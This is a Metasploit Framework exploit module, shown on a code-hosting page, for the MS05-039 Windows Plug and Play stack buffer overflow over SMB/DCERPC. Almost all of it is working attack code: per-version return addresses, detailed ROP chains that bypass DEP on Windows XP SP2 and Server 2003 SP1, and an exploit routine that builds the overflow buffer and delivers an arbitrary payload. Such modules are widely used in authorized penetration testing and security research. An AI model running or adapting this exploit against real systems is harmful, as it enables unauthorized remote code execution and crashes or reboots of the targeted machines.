CoCalc -- ms05_039

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/ms05_039_pnp.rb
³³⁵⁴⁶ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'MS05-039 Microsoft Plug and Play Service Overflow',
17
        'Description' => %q{
18
          This module exploits a stack buffer overflow in the Windows Plug
19
          and Play service. This vulnerability can be exploited on
20
          Windows 2000 without a valid user account.
21

22
          NOTE: Since the PnP service runs inside the service.exe process, a failed
23
          exploit attempt will cause the system to automatically reboot.
24
        },
25
        'Author' => [ 'hdm', 'cazz' ],
26
        'License' => MSF_LICENSE,
27
        'References' => [
28
          [ 'CVE', '2005-1983' ],
29
          [ 'OSVDB', '18605' ],
30
          [ 'BID', '14513' ],
31
          [ 'MSB', 'MS05-039' ]
32
        ],
33
        'DefaultOptions' => {
34
          'EXITFUNC' => 'thread'
35
        },
36
        'Privileged' => true,
37
        'Payload' => {
38
          'Space' => 1000,
39
          'BadChars' => "\x00",
40
          'StackAdjustment' => -3500
41
        },
42
        'Platform' => 'win',
43
        'Targets' => [
44
          [
45
            'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
46
            {
47
              'Ret' => 0x767a38f6 # umpnpmgr.dll
48
            },
49
          ],
50
          [
51
            'Windows 2000 SP4 French',
52
            {
53
              'Author' => 'ExaProbe <[email protected]>',
54
              'Ret' => 0x767438f6
55
            },
56
          ],
57
          [
58
            'Windows 2000 SP4 Spanish',
59
            {
60
              'Ret' => 0x767738f6 # umpnpmgr.dll
61
            },
62
          ],
63
          [
64
            # Tested on: English/French/German/Dutch/Finnish/Greek/Polish/Portuguese/Hungarian/Korean/Chinese/Arabic/Turkish/Russian
65
            'Windows 2000 SP4 Universal',
66
            {
67
              'Author' => 'Pita Houmous <[email protected]>',
68
              'Ret' => 0x01013C79
69
            },
70
          ],
71
          [
72
            'Windows 2000 SP0-SP4 German',
73
            {
74
              'Author' => 'Michael Thumann <[email protected]>',
75
              'Ret' => 0x767338f6
76
            },
77
          ],
78
          [
79
            'Windows 2000 SP0-SP4 Italian',
80
            {
81
              'Author' => 'acaro <[email protected]>',
82
              'Ret' => 0x7677366f
83
            },
84
          ],
85
          [
86
            'Windows XP SP1 English',
87
            {
88
              'Ret' => 0x758c572a, # pop edi / pop ebx / ret in umpnpmgr.dll v5.1.2600.1106
89
              'Pipe' => 'ntsvcs',
90
              'Offset' => 16
91
            }
92
          ],
93
          # NOTE: XP SP2, Server 2003 (and SP1) require an Administrator account to access
94
          # the vulnerable functionality.
95
          [
96
            'Windows XP SP2 English (Requires Admin)',
97
            # SafeSEH enabled, DEP AlwaysOn
98
            {
99
              # 'Ret'       => 0x41424344,
100
              'Ret' => 0x758d2bb3, # pop eax / ret 0x8
101
              'Pipe' => 'ntsvcs',
102
              'PtrToZero' => 0x758c0170, # PE data of umpnpmgr.dll v5.1.2600.2180
103
              'Offset' => 72,
104
              'EspOffset' => 108,
105
              'RopStack' =>
106
                # All addresses are from umpnpmgr.dll v5.2.3790.1830
107
                [
108
                  #
109
                  # Step 1. Allocate an executable heap with HeapCreate
110
                  #
111
                  # Resolve HeapCreate from import
112
                  0x758c1148,            # pointer to HeapCreate import
113
                  0x758c2950,            # mov eax, [eax] / pop ebp / ret 0x8
114
                  0x41414141,            # scratch
115
                  0x41414141,            # scratch
116
                  # 0x758da008,            # becomes ebp (something writable)
117
                  0x758da1c8 - 0xc, # becomes ebp (writable, used later)
118

119
                  # Call HeapCreate
120
                  0x758cb728,            # call eax / mov [ebp+0xc],eax / jmp... / mov eax,[ebp+0xc] / pop edi,esi,ebx,ebp / ret 0xc
121
                  0x41414141,            # scratch
122
                  0x41414141,            # scratch
123
                  0x01040110,            # flOptions (gets & with 0x40005)
124
                  0x01010101,
125
                  0x01010101,
126
                  0x758ce552,            # becomes edi - pop edi,esi / ret
127
                  0x758cdd7e,            # becomes esi - pop esi,ebx,ebp / ret 0x4
128
                  0x41414141,            # becomes ebx
129
                  0x41414141,            # becomes ebp
130

131
                  # Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base
132
                  0x758d45f3,            # or eax,0x8000 / pop ebp / ret 0x4
133
                  0x41414141,            # scratch
134
                  0x41414141,            # scratch
135
                  0x41414141,            # scratch
136
                  0x41414141,            # becomes ebp
137

138
                  # save eax to ebx
139
                  0x758ce0d5,            # push eax / call esi
140
                  0x41414141,            # scratch
141
                  0x758da008 + 0x18, # becomes ebp
142

143
                  # Setup eax to load our saved stack pointer
144
                  0x758d18db,            # pop eax / ret 0xc
145
                  0x41414141,            # scratch
146
                  0x758c524e,            # becomes eax - pop ebp / ret 0x8
147
                  # 0x758c2423,            # becomes eax - pop esi,ebp / ret 0x8
148

149
                  # Store a pointer to the stack to a known address (ebp-0x18), flows to eax after
150
                  0x758c1281,            # mov [ebp-0x18],esp / push eax / mov eax,[ebp-4] / mov [ebp-4],0xffffffff / mov [ebp-8],eax / lea eax,[ebp-0x10] / mov fs:[0],eax / ret
151
                  0x41414141,            # scratch
152
                  0x41414141,            # scratch
153
                  0x41414141,            # scratch
154
                  # 0xcafebabe,            # becomes esi
155
                  0x758da008 - 0x10, # becomes ebp
156

157
                  # Call lstrcpyW to copy shellcode into executable heap
158
                  0x758c542e,            # push [ebp+0x10] / push ebx / call lstrcpyW / push ebx / call edi
159
                  0x41414141,            # scratch
160
                  0x41414141,            # scratch
161

162
                  # Skip the junk
163
                  0x758c96f6, # add al,0x3b / ret
164

165
                  # Call the executable segment!
166
                  0x758c3b62 # call eax
167
                ]
168
            }
169
          ],
170
          [
171
            'Windows Server 2003 SP0 English (Requires Admin)',
172
            # SafeSEH unsupported, DEP unsupported
173
            {
174
              'Ret' => 0x780df756, # push esp / ret in msvcp60.dll
175
              'Pipe' => 'ntsvcs',
176
              'PtrToZero' => 0x757702c0, # PE data of umpnpmgr.dll
177
              'Offset' => 72
178
            }
179
          ],
180
          [
181
            'Windows Server 2003 SP1 English (Requires Admin)',
182
            # SafeSEH enabled, DEP AlwaysOn
183
            {
184
              'Pipe' => 'ntsvcs',
185
              # We will need to bypass DEP!
186
              # 'Ret'       => 0x41424344,
187
              'Ret' => 0x757873d5, # pop eax / ret 0x4
188
              'PtrToZero' => 0x757702c0, # PE data of umpnpmgr.dll
189
              'Offset' => 72, # offset to saved eip
190
              'EspOffset' => 108, # Offset to where esp ends up pointing
191
              'RopStack' =>              # NOTE: 0x41414141 will become random data
192
                # All addresses are from umpnpmgr.dll v5.2.3790.1830
193
                [
194
                  #
195
                  # Step 1. Allocate an executable heap with HeapCreate
196
                  #
197
                  # Resolve HeapCreate from import
198
                  0x75771144,            # pointer to HeapCreate import
199
                  0x75772e68,            # mov eax, [eax] / pop ebp / ret
200
                  0x41414141,            # scratch
201
                  0x41414141,            # becomes ebp
202
                  # Call HeapCreate
203
                  0x7578bc37,            # jmp eax
204
                  0x41414141,            # scratch
205
                  0x41414141,            # scratch
206
                  # Save the new heap address in edi
207
                  0x757791d5,            # xchg eax,edi / cmp bh,0xff / ret 0x10
208
                  0x01040110,            # flOptions (gets & with 0x40005)
209
                  0x01010101,
210
                  0x01010101,
211

212
                  #
213
                  # Step 2. Allocate a buffer using this new heap.
214
                  #
215
                  0x757873d5,            # pop eax / ret 0x4
216
                  0x41414141,            # scratch
217
                  0x41414141,            # scratch
218
                  0x41414141,            # scratch
219
                  0x41414141,            # scratch
220
                  # Resolve HeapAlloc from import
221
                  0x7577115c,            # pointer to HeapAlloc import
222
                  0x75772e68,            # mov eax, [eax] / pop ebp / ret
223
                  0x41414141,            # scratch
224
                  0x41414141,            # becomes ebp
225
                  # Save the address of HeapAlloc in esi
226
                  0x75777ae0,            # xchg eax,esi / mov dl,0xff / dec ecx / ret
227
                  0x41414141,            # scratch
228
                  0x41414141,            # scratch
229
                  # Call HeapAlloc
230
                  0x7578bb6b,            # push edi / call esi / pop edi,esi,ebp / ret
231
                  0xffffffff,            # flags
232
                  0x00010001,            # allocation size
233
                  0x0101018d,            # becomes edi / first byte stored
234
                  0x7577835c,            # becomes esi - pop esi / pop ebx / ret
235
                  0x757830c3,            # becomes ebp/eip - pop esi / ret
236

237
                  #
238
                  # Step 3. Save the heap address into ebx
239
                  #
240
                  0x7578308f,            # push eax / mov [0x7578d8e0],edi / mov [0x7578d39c],edi / call esi
241
                  0x41414141,            # scratch
242
                  # Put heap address in edi
243
                  0x757791d5, # xchg eax,edi / cmp bh,0xff / ret 0x10
244

245
                  #
246
                  # Step 4. Write stub:
247
                  #
248
                  # metasm > lea esi,[esp+4]; _start: lodsb; test al,al; jz _out; stosb; _end: jmp _start; _out:
249
                  # "\x8d\x74\x24\x04\xac\x84\xc0\x74\x03\xaa\xeb\xf8"
250
                  #
251
                  # Store the first byte.
252
                  0x7578be14,            # stosb / ret
253
                  0x41414141,            # scratch
254
                  0x41414141,            # scratch
255
                  0x41414141,            # scratch
256
                  0x41414141,            # scratch
257
                  # Store another byte!
258
                  0x757873d5,            # pop eax / ret 0x4
259
                  0x01010174,            # next byte to write
260
                  0x7578be14,            # stosb / ret
261
                  0x41414141,            # scratch
262
                  # Store another byte!
263
                  0x757873d5,            # pop eax / ret 0x4
264
                  0x01010124,            # next byte to write
265
                  0x7578be14,            # stosb / ret
266
                  0x41414141,            # scratch
267
                  # Store another byte!
268
                  0x757873d5,            # pop eax / ret 0x4
269
                  0x01010104,            # next byte to write
270
                  0x7578be14,            # stosb / ret
271
                  0x41414141,            # scratch
272
                  # Store another byte!
273
                  0x757873d5,            # pop eax / ret 0x4
274
                  0x010101ac,            # next byte to write
275
                  0x7578be14,            # stosb / ret
276
                  0x41414141,            # scratch
277
                  # Store another byte!
278
                  0x757873d5,            # pop eax / ret 0x4
279
                  0x01010184,            # next byte to write
280
                  0x7578be14,            # stosb / ret
281
                  0x41414141,            # scratch
282
                  # Store another byte!
283
                  0x757873d5,            # pop eax / ret 0x4
284
                  0x010101c0,            # next byte to write
285
                  0x7578be14,            # stosb / ret
286
                  0x41414141,            # scratch
287
                  # Store another byte!
288
                  0x757873d5,            # pop eax / ret 0x4
289
                  0x01010174,            # next byte to write
290
                  0x7578be14,            # stosb / ret
291
                  0x41414141,            # scratch
292
                  # Store another byte!
293
                  0x757873d5,            # pop eax / ret 0x4
294
                  0x01010103,            # next byte to write
295
                  0x7578be14,            # stosb / ret
296
                  0x41414141,            # scratch
297
                  # Store another byte!
298
                  0x757873d5,            # pop eax / ret 0x4
299
                  0x010101aa,            # next byte to write
300
                  0x7578be14,            # stosb / ret
301
                  0x41414141,            # scratch
302
                  # Store another byte!
303
                  0x757873d5,            # pop eax / ret 0x4
304
                  0x010101eb,            # next byte to write
305
                  0x7578be14,            # stosb / ret
306
                  0x41414141,            # scratch
307
                  # Store another byte!
308
                  0x757873d5,            # pop eax / ret 0x4
309
                  0x010101f8,            # next byte to write
310
                  0x7578be14,            # stosb / ret
311
                  0x41414141,            # scratch
312

313
                  #
314
                  # Step 5. Finally, call our executable heap buffer.
315
                  #
316
                  0x75783efe # call ebx
317
                ]
318
            }
319
          ]
320
        ],
321
        'DefaultTarget' => 0,
322
        'DisclosureDate' => '2005-08-09',
323
        'Notes' => {
324
          'Reliability' => UNKNOWN_RELIABILITY,
325
          'Stability' => UNKNOWN_STABILITY,
326
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
327
        }
328
      )
329
    )
330

331
    register_options(
332
      [
333
        OptString.new('SMBPIPE', [ true, 'The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)', 'browser']),
334
      ]
335
    )
336
  end
337

338
  def pnp_probe(req, pipe = datastore['SMBPIPE'])
339
    print_status('Connecting to the SMB service...')
340
    begin
341
      connect
342
      smb_login
343
    rescue ::Exception => e
344
      print_error("Error: #{e.class} #{e}")
345
    end
346

347
    handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{pipe}"])
348
    print_status("Binding to #{handle} ...")
349
    dcerpc_bind(handle)
350
    print_status("Bound to #{handle} ...")
351

352
    # CS_DES
353
    cs_des =
354
      NDR.long(0) + # CSD_SignatureLength
355
      NDR.long(0) + # CSD_LegacyDataOffset
356
      NDR.long(req.length) + # CSD_LegacyDataSize
357
      NDR.long(0) + # CSD_Flags
358
      rand_text(16) + # GUID
359
      req # CSD_LegacyData
360

361
    # PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);
362

363
    # ResourceName:
364
    stubdata =
365
      NDR.UnicodeConformantVaryingString('a\\b\\c') +  # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
366
      NDR.long(0xffff) +                               # ResourceID: ResType_ClassSpecific
367
      NDR.UniConformantArray(cs_des) +                 # Resource (our CS_DES structure)
368
      NDR.long(cs_des.length) +                        # ResourceLen
369
      NDR.long(4) +                                    # OutputLen (at least 4)
370
      NDR.long(0)                                      # Flags
371

372
    print_status('Calling the vulnerable function...')
373

374
    begin
375
      dcerpc.call(0x36, stubdata)
376
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
377
      print_status('Server did not respond, this is expected')
378
    rescue StandardError => e
379
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
380
        print_status('Server disconnected, this is expected')
381
      else
382
        raise e
383
      end
384
    end
385

386
    # Cleanup
387
    disconnect
388

389
    if (!dcerpc.last_response.nil? and !dcerpc.last_response.stub_data.nil? and
390
        dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
391
      return true
392
    else
393
      return false
394
    end
395
  end
396

397
  def check
398
    if (pnp_probe('A'))
399
      return Exploit::CheckCode::Vulnerable
400
    end
401

402
    return Exploit::CheckCode::Safe
403
  end
404

405
  def exploit
406
    # If PtrToZero is set, we use saved-ret-overwrite instead of SEH.
407
    if target['PtrToZero']
408
      eip_off = target['Offset']
409
      nul_off = eip_off + 8
410

411
      # DEP Bypass version (2003 SP1)
412
      if target['RopStack']
413
        esp_off = target['EspOffset']
414

415
        # Start with a randomized base buffer
416
        rop_length = target['RopStack'].length * 4
417
        print_status('ROP Data is %u bytes' % rop_length)
418
        buf = rand_text(esp_off + rop_length)
419

420
        # Put the rest of the stack data at where esp ends up...
421
        target['RopStack'].each_with_index do |el, idx|
422
          if el != 0x41414141
423
            buf[esp_off + (idx * 4), 4] = [el].pack('V')
424
          end
425
        end
426
      else
427
        # Start with a randomized base buffer
428
        buf = rand_text(nul_off)
429
      end
430

431
      # This becomes EIP
432
      buf[eip_off, 4] = [target.ret].pack('V')
433

434
      # Pointer to NULL (4 zero bytes)
435
      buf[nul_off, 4] = [target['PtrToZero']].pack('V')
436
    else
437
      # Pad the string up to reach our SEH frame
438
      buf = rand_text(target['Offset'] || 56)
439

440
      # Jump over the address and our invalid pointer to the payload
441
      buf << Rex::Arch::X86.jmp_short('$+32')
442
      buf << rand_text(2)
443

444
      # The SEH handler pointer
445
      buf << [target.ret].pack('V')
446

447
      # Some padding to reach the next pointer
448
      buf << rand_text(20)
449

450
      # ResourceName - cause access violation on RtlInitUnicodeString
451
      buf << rand_text(3) + "\xff"
452
    end
453

454
    # Append the encoded payload and we are good to go!
455
    buf << payload.encoded
456

457
    # Determine which pipe to use
458
    pipe = target['Pipe'] || datastore['SMBPIPE']
459

460
    pnp_probe(buf, pipe)
461

462
    print_status('The server should have executed our payload')
463

464
    handler
465
  end
466
end
467

468
Product

Resources

Company
